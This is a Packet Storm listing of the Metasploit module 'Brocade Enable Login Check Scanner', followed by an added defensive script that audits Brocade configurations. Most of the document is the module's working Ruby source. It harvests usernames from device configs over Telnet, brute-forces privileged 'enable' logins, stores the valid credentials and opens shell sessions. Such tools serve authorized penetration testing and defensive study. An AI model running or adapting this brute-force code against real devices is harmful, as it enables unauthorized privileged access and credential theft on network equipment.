Brocade Enable Login Check Scanner

Date: 31 Aug 2024 00:00:00. Reported by: h00die, metasploit.com. Type: packetstorm. Source: packetstormsecurity.com.

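This module tests a range of Brocade network devices for privileged logins and reports the successes. The device authentication mode must be set as 'aaa authentication enable default local', and Telnet authentication (e.g. 'enable telnet authentication') should not be enabled in the device configuration. The module has been tested against specific device models, listed in its description.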

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/telnet'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Telnet
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::CommandShell
  include Msf::Sessions::CreateSessionOptions
  include Msf::Auxiliary::ReportSummary

  def initialize
    super(
      'Name' => 'Brocade Enable Login Check Scanner',
      'Description' => %q{
        This module will test a range of Brocade network devices for a
        privileged logins and report successes. The device authentication mode
        must be set as 'aaa authentication enable default local'.
        Telnet authentication, e.g. 'enable telnet authentication', should not
        be enabled in the device configuration.

        This module has been tested against the following devices:
        ICX6450-24 SWver 07.4.00bT311,
        FastIron WS 624 SWver 07.2.02fT7e1
      },
      'Author' => 'h00die <mike[at]shorebreaksecurity.com>',
      'References' =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        OptBool.new('GET_USERNAMES_FROM_CONFIG', [ false, 'Pull usernames from config and running config', true])
      ], self.class
    )

    @no_pass_prompt = []
  end

  def get_username_from_config(un_list,ip)
    ["config", "running-config"].each do |command|
      print_status(" Attempting username gathering from #{command} on #{ip}")
      sock.puts("\r\n") # ensure that the buffer is clear
      config = sock.recv(1024)
      sock.puts("show #{command}\r\n")

      # pull the entire config
      while true do
        sock.puts(" \r\n") # paging
        config << sock.recv(1024)
        # Read until we are back at a prompt and have received the 'end' of
        # the config.
        break if config.match(/>$/) and config.match(/end/)
      end

      config.each_line do |un|
        if un.match(/^username/)
          found_username = un.split(" ")[1].strip
          un_list.push(found_username)
          print_status(" Found: #{found_username}@#{ip}")
        end
      end
    end
  end

  attr_accessor :no_pass_prompt
  attr_accessor :password_only

  def run_host(ip)
    un_list = []
    if datastore['GET_USERNAMES_FROM_CONFIG']
      connect()
      get_username_from_config(un_list,ip)
      disconnect()
    end

    if datastore['USERNAME'] #put the provided username on the array to try
      un_list.push(datastore['USERNAME'])
    end

    un_list.delete('logout') #logout, even when used as a un or pass will exit the terminal

    un_list.each do |un|
      cred_collection = build_credential_collection(
        username: datastore['USERNAME'],
        password: datastore['PASSWORD']
      )

      scanner = Metasploit::Framework::LoginScanner::Telnet.new(
        configure_login_scanner(
          host: ip,
          port: rport,
          proxies: datastore['PROXIES'],
          cred_details: cred_collection,
          stop_on_success: datastore['STOP_ON_SUCCESS'],
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
          connection_timeout: datastore['Timeout'],
          max_send_size: datastore['TCP::max_send_size'],
          send_delay: datastore['TCP::send_delay'],
          banner_timeout: datastore['TelnetBannerTimeout'],
          telnet_timeout: datastore['TelnetTimeout'],
          pre_login: lambda { |s| raw_send("enable\r\n", s.sock) },
          framework: framework,
          framework_module: self,
          ssl: datastore['SSL'],
          ssl_version: datastore['SSLVersion'],
          ssl_verify_mode: datastore['SSLVerifyMode'],
          ssl_cipher: datastore['SSLCipher'],
          local_port: datastore['CPORT'],
          local_host: datastore['CHOST']
        )
      )

      scanner.scan! do |result|
        credential_data = result.to_h
        credential_data.merge!(
          module_fullname: self.fullname,
          workspace_id: myworkspace_id
        )

        if result.success?
          credential_core = create_credential(credential_data)
          credential_data[:core] = credential_core
          create_credential_login(credential_data)
          print_good("#{ip}:#{rport} - Login Successful: #{result.credential}")
          start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)
        else
          invalidate_login(credential_data)
          print_error("#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})")
        end
      end
    end
  end

  def start_telnet_session(host, port, user, pass, scanner)
    print_status("Attempting to start session #{host}:#{port} with #{user}:#{pass}")
    merge_me = {
      'USERPASS_FILE' => nil,
      'USER_FILE' => nil,
      'PASS_FILE' => nil,
      'USERNAME' => user,
      'PASSWORD' => pass
    }

    start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock) if datastore['CreateSession']
  end
end
```
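For defenders, the conditions named in the module description can be checked offline against a saved device configuration. The following is an added example, not part of the module or of Metasploit; the function name `audit_brocade_config`, the finding identifiers and the sample configuration are assumptions constructed for illustration.

```ruby
# Added example: audit a saved Brocade configuration for the conditions the
# module description names. Names and sample data here are illustrative.
Finding = Struct.new(:id, :detail)

def audit_brocade_config(text)
  lines = text.each_line.map(&:strip).reject { |l| l.empty? || l.start_with?('!') }
  findings = []

  # The module description requires Telnet authentication to be off.
  unless lines.include?('enable telnet authentication')
    findings << Finding.new(:telnet_unauthenticated,
                            "'enable telnet authentication' is not configured")
  end

  # Authentication mode the module description requires for enable logins.
  if lines.include?('aaa authentication enable default local')
    findings << Finding.new(:enable_uses_local_accounts,
                            'enable authentication uses the local user database')
  end

  # Same rule the module applies: second token of each "username ..." line.
  users = lines.select { |l| l.start_with?('username ') }
               .map { |l| l.split[1] }.compact.uniq
  unless users.empty?
    findings << Finding.new(:usernames_in_config,
                            "local accounts visible in config: #{users.join(', ')}")
  end

  findings
end

# Constructed sample configuration, not taken from a real device.
SAMPLE_CONFIG = <<~CFG
  !
  aaa authentication enable default local
  username admin password .....
  username netops password .....
  !
  end
CFG

if __FILE__ == $PROGRAM_NAME
  audit_brocade_config(SAMPLE_CONFIG).each { |f| puts "#{f.id}: #{f.detail}" }
end
```

A configuration that reports `telnet_unauthenticated` together with `usernames_in_config` matches the setup the module was written for, so those devices are the ones to prioritise for stronger local passwords and Telnet authentication.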
